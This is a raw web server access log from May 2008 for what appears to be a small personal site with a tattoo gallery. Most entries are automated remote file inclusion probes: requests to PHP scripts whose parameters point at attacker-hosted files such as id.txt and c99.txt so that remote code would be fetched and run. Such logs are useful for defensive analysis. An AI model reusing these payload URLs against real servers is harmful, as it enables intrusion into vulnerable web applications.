74.55.113.226 - - [28/May/2008:11:34:11 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/id.txt?? HTTP/1.1" 404 402 "-""libwww-perl/5.805"
65.55.208.135 - - [28/May/2008:11:34:37 -0500] "GET /logs/access_log.1175212800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
74.53.68.226 - - [28/May/2008:11:37:31 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 413 "-""libwww-perl/5.79"
74.53.68.226 - - [28/May/2008:11:37:31 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 408 "-""libwww-perl/5.79"
74.53.68.226 - - [28/May/2008:11:38:28 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 408 "-""libwww-perl/5.79"
75.125.202.82 - - [28/May/2008:11:39:56 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 413 "-""libwww-perl/5.79"
75.125.202.82 - - [28/May/2008:11:39:56 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 408 "-""libwww-perl/5.79"
75.72.242.115 - - [28/May/2008:11:40:04 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://www.google.com/search?q=600+ad+costume&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
89.108.67.192 - - [28/May/2008:11:40:39 -0500] "GET /logs//tools/errors.php?error=http://www.kamablackbelt.com/install/id.txt???? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
89.108.67.192 - - [28/May/2008:11:40:40 -0500] "GET //tools/errors.php?error=http://www.kamablackbelt.com/install/id.txt???? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
75.125.202.82 - - [28/May/2008:11:43:05 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 408 "-""libwww-perl/5.79"
62.2.100.138 - - [28/May/2008:11:43:54 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/error.php?dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
62.2.100.138 - - [28/May/2008:11:43:55 -0500] "GET //skin/zero_vote/error.php?dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
62.2.100.138 - - [28/May/2008:11:43:55 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
62.2.100.138 - - [28/May/2008:11:43:58 -0500] "GET /logs/access_log.1207180800//skin/zero_vote/error.php?dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
75.125.252.82 - - [28/May/2008:11:44:36 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 425 "-""libwww-perl/5.810"
75.125.252.82 - - [28/May/2008:11:44:37 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 420 "-""libwww-perl/5.810"
59.126.46.141 - - [28/May/2008:11:47:17 -0500] "GET //eqdkp/admin/index.php?s=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
59.126.46.141 - - [28/May/2008:11:47:17 -0500] "GET /logs//eqdkp/admin/index.php?s=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
193.109.80.8 - - [28/May/2008:11:50:16 -0500] "GET /logs//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
193.109.80.8 - - [28/May/2008:11:50:16 -0500] "GET //include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
69.9.36.146 - - [28/May/2008:11:55:27 -0500] "GET /logs//modules/My_eGallery/index.php?include_path=http://exquisitedreams.com/catalog/readme.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.812"
69.9.36.146 - - [28/May/2008:11:55:27 -0500] "GET //modules/My_eGallery/index.php?include_path=http://exquisitedreams.com/catalog/readme.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.812"
65.55.208.133 - - [28/May/2008:11:58:21 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [28/May/2008:11:58:21 -0500] "GET /logs/access_log.1168387200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
84.21.71.133 - - [28/May/2008:11:58:49 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
84.21.71.133 - - [28/May/2008:11:58:50 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
202.179.180.41 - - [28/May/2008:11:58:57 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)"
202.179.180.41 - - [28/May/2008:11:59:00 -0500] "GET / HTTP/1.1" 200 1243 "-""Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)"
193.109.80.8 - - [28/May/2008:11:59:13 -0500] "GET //include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
193.109.80.8 - - [28/May/2008:12:03:03 -0500] "GET //include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
62.2.100.138 - - [28/May/2008:12:03:23 -0500] "GET /logs//?index.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 200 85278 "-""libwww-perl/5.803"
62.2.100.138 - - [28/May/2008:12:03:24 -0500] "GET //?index.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
64.38.8.186 - - [28/May/2008:12:04:00 -0500] "GET /logs/admin.php?include_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
64.38.8.186 - - [28/May/2008:12:04:01 -0500] "GET /admin.php?include_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
216.167.156.20 - - [28/May/2008:12:05:03 -0500] "GET /logs/admin.php?include_path=http://a1a-live.com/cache/readme.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
216.167.156.20 - - [28/May/2008:12:05:03 -0500] "GET /admin.php?include_path=http://a1a-live.com/cache/readme.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
74.53.68.226 - - [28/May/2008:12:05:05 -0500] "GET /logs/access_log.1207785600//modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 435 "-""libwww-perl/5.79"
74.53.68.226 - - [28/May/2008:12:05:06 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 408 "-""libwww-perl/5.79"
74.53.68.226 - - [28/May/2008:12:05:06 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 413 "-""libwww-perl/5.79"
75.125.252.82 - - [28/May/2008:12:07:13 -0500] "GET /logs//modules/My_eGallery/index.php?include_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 319 "-""libwww-perl/5.810"
75.125.252.82 - - [28/May/2008:12:07:13 -0500] "GET //modules/My_eGallery/index.php?include_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
84.21.71.133 - - [28/May/2008:12:07:50 -0500] "GET /logs/admin.php?include_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
84.21.71.133 - - [28/May/2008:12:07:50 -0500] "GET /admin.php?include_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
193.109.80.8 - - [28/May/2008:12:11:21 -0500] "GET /logs//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
75.125.202.82 - - [28/May/2008:12:12:47 -0500] "GET /logs/access_log.1207785600//modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 435 "-""libwww-perl/5.79"
75.125.202.82 - - [28/May/2008:12:12:47 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 408 "-""libwww-perl/5.79"
75.125.202.82 - - [28/May/2008:12:12:47 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 413 "-""libwww-perl/5.79"
88.232.107.38 - - [28/May/2008:12:15:49 -0500] "GET http://tomdolan.pconline.com/login.php?dir=http://www.turkishdefacerteam.by.ru/c99.txt? HTTP/1.0" 404 281 "-""-"
88.232.107.38 - - [28/May/2008:12:15:50 -0500] "GET http://tomdolan.pconline.com/login.php?dir=http://www.turkishdefacerteam.by.ru/c99.txt? HTTP/1.0" 404 281 "-""-"
64.38.8.186 - - [28/May/2008:12:18:17 -0500] "GET /logs/access_log.1207785600//faqsupport/samplefaqsupport.php?path[docroot]=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 343 "-""libwww-perl/5.811"
64.38.8.186 - - [28/May/2008:12:18:17 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 316 "-""libwww-perl/5.811"
64.38.8.186 - - [28/May/2008:12:18:17 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
64.38.8.186 - - [28/May/2008:12:18:21 -0500] "GET /logs/access_log.1207180800//faqsupport/samplefaqsupport.php?path[docroot]=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 343 "-""libwww-perl/5.811"
222.122.13.106 - - [28/May/2008:12:27:29 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/error.php?dir=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
222.122.13.106 - - [28/May/2008:12:27:30 -0500] "GET //skin/zero_vote/error.php?dir=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
222.122.13.106 - - [28/May/2008:12:27:30 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
222.122.13.106 - - [28/May/2008:12:28:23 -0500] "GET /logs/access_log.1207008000//skin/zero_vote/error.php?dir=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
216.167.156.20 - - [28/May/2008:12:36:26 -0500] "GET /logs/access_log.1207785600//faqsupport/samplefaqsupport.php?path[docroot]=http://a1a-live.com/cache/readme.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
216.167.156.20 - - [28/May/2008:12:36:26 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://a1a-live.com/cache/readme.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.65"
216.167.156.20 - - [28/May/2008:12:36:26 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://a1a-live.com/cache/readme.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
216.167.156.20 - - [28/May/2008:12:36:30 -0500] "GET /logs/access_log.1207180800//faqsupport/samplefaqsupport.php?path[docroot]=http://a1a-live.com/cache/readme.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
64.38.8.186 - - [28/May/2008:12:36:45 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
64.38.8.186 - - [28/May/2008:12:36:45 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
24.243.106.71 - - [28/May/2008:12:39:06 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://search.yahoo.com/search?p=vintage+tattoo+flash&fr=yfp-t-501-s&toggle=1&cop=mss&ei=UTF-8""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:39:06 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:39:06 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:39:07 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:39:17 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:39:17 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:39:17 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:39:17 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:39:17 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:39:17 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:39:18 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:39:18 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:39:18 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:39:18 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:39:18 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:39:45 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2214 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:39:45 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:39:45 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:39:45 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:39:46 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:39:46 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:39:46 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:39:46 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:39:46 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:39:46 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:39:46 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:40:13 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1991 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:40:13 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:40:13 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:40:14 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:40:14 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:40:14 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:40:14 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:40:14 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:40:14 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:40:14 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:40:14 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:40:51 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:40:51 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:40:51 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
24.243.106.71 - - [28/May/2008:12:40:51 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; UA15000; UQSJITLIVH; .NET CLR 2.0.50727)"
64.136.58.116 - - [28/May/2008:12:41:19 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
64.136.58.116 - - [28/May/2008:12:41:19 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
74.55.53.226 - - [28/May/2008:12:41:53 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
212.97.132.101 - - [28/May/2008:12:41:54 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 309 "-""libwww-perl/5.53"
74.55.53.226 - - [28/May/2008:12:41:54 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
212.97.132.101 - - [28/May/2008:12:41:54 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 304 "-""libwww-perl/5.53"
212.97.132.101 - - [28/May/2008:12:41:55 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 309 "-""libwww-perl/5.53"
212.97.132.101 - - [28/May/2008:12:41:56 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 304 "-""libwww-perl/5.53"
212.97.132.101 - - [28/May/2008:12:44:52 -0500] "GET /logs/db.php?path_local=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 283 "-""libwww-perl/5.53"
212.97.132.101 - - [28/May/2008:12:44:52 -0500] "GET /db.php?path_local=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 278 "-""libwww-perl/5.53"
212.97.132.101 - - [28/May/2008:12:44:58 -0500] "GET /logs/db.php?path_local=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 283 "-""libwww-perl/5.53"
212.97.132.101 - - [28/May/2008:12:44:59 -0500] "GET /db.php?path_local=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 278 "-""libwww-perl/5.53"
64.136.58.116 - - [28/May/2008:12:45:03 -0500] "GET /logs/db.php?path_local=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
64.136.58.116 - - [28/May/2008:12:45:03 -0500] "GET /db.php?path_local=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 290 "-""libwww-perl/5.805"
74.55.53.226 - - [28/May/2008:12:45:54 -0500] "GET /logs/db.php?path_local=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
